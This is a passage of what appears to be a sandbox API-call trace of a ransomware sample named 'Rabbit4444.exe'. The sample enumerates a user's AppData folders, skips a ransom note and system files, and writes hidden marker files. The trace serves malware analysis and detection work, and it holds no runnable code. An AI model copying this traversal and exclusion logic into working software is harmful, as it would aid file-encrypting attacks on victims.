(hFile=0x228) returned 1 [0066.852] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.852] CloseHandle (hObject=0x228) returned 1 [0066.853] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy") returned 90 [0066.853] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.853] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf12a98c3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0066.853] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.853] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.853] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.853] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.853] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf12a98c3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.853] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.853] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.853] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.853] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.853] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.853] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf12a98c3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf12a98c3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf12a98c3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.853] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.853] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.853] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75e71ae4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0066.853] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.853] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.853] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0066.853] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0066.854] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0066.854] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0066.854] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0066.854] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0066.854] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0066.854] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0066.854] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0066.854] lstrcpyW (in: lpString1=0x130ebee, lpString2="AC" | out: lpString1="AC") returned="AC" [0066.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222a0 [0066.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0xefb28 [0066.854] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222a8 | out: ListHead=0xf68b0, ListEntry=0x1222a8) returned 0x11cde8 [0066.854] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75e25670, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e25670, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75e25670, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0066.854] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.854] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.854] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0066.854] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0066.854] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0066.854] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0066.854] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0066.854] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0066.854] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0066.854] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0066.854] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0066.854] lstrcpyW (in: lpString1=0x130ebee, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0066.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0066.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x116110 [0066.854] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x1222a8 [0066.854] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75dff3f8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75dff3f8, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0066.854] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.854] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.854] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0066.854] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0066.855] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0066.855] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0066.855] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0066.855] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0066.855] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0066.855] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0066.855] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0066.855] lstrcpyW (in: lpString1=0x130ebee, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0066.855] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0066.855] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108838 [0066.855] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x1222c8 [0066.855] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75dff3f8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75dff3f8, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0066.855] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.855] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.855] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0066.855] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0066.855] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0066.855] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0066.855] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0066.855] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0066.855] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0066.855] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0066.855] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0066.855] lstrcpyW (in: lpString1=0x130ebee, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0066.855] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0066.855] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108760 [0066.855] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221a8 | out: ListHead=0xf68b0, ListEntry=0x1221a8) returned 0x121f88 [0066.855] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75dff3f8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75dff3f8, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0066.855] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.855] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.855] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0066.855] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0066.855] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0066.855] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0066.855] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0066.856] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0066.856] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0066.856] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0066.856] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0066.856] lstrcpyW (in: lpString1=0x130ebee, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0066.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fa0 [0066.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd0) returned 0x108688 [0066.856] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fa8 | out: ListHead=0xf68b0, ListEntry=0x121fa8) returned 0x1221a8 [0066.856] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e25670, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75e25670, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0066.856] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.856] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.856] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0066.856] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0066.856] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0066.856] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0066.856] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0066.856] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0066.856] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0066.856] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0066.856] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0066.856] lstrcpyW (in: lpString1=0x130ebee, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0066.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122180 [0066.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc8) returned 0x115ea0 [0066.856] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122188 | out: ListHead=0xf68b0, ListEntry=0x122188) returned 0x121fa8 [0066.856] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75e25670, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e25670, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75e25670, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0066.856] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.856] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.856] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0066.856] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0066.856] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0066.856] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0066.856] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0066.856] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0066.856] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0066.856] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0066.856] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0066.857] lstrcpyW (in: lpString1=0x130ebee, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0066.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122340 [0066.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd2) returned 0x11bf88 [0066.857] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122348 | out: ListHead=0xf68b0, ListEntry=0x122348) returned 0x122188 [0066.857] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75dff3f8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75dff3f8, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0066.857] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.857] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.857] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0066.857] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0066.857] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0066.857] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0066.857] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0066.857] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0066.857] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0066.857] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0066.857] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0066.857] lstrcpyW (in: lpString1=0x130ebee, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0066.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122160 [0066.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xca) returned 0x108328 [0066.857] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122168 | out: ListHead=0xf68b0, ListEntry=0x122168) returned 0x122348 [0066.857] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75dff3f8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75dff3f8, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0066.857] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0066.857] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.857] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.858] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.858] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.858] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.858] CloseHandle (hObject=0x27c) returned 1 [0066.858] CloseHandle (hObject=0x228) returned 1 [0066.858] GetCurrentThreadId () returned 0xd98 [0066.858] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122168 [0066.858] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState" [0066.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108328 | out: hHeap=0xe0000) returned 1 [0066.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122160 | out: hHeap=0xe0000) returned 1 [0066.859] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState" [0066.859] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState\\" [0066.859] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0066.859] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.861] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.863] FlushFileBuffers (hFile=0x228) returned 1 [0066.864] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.864] CloseHandle (hObject=0x228) returned 1 [0066.865] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState") returned 100 [0066.865] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.865] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75dff3f8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf12cfac7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0066.865] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.865] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.865] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.865] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.865] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75dff3f8, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf12cfac7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.865] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.865] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.866] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.866] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.866] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.866] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf12cfac7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf12cfac7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf12cfac7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.866] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.866] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.866] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf12cfac7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf12cfac7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf12cfac7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, 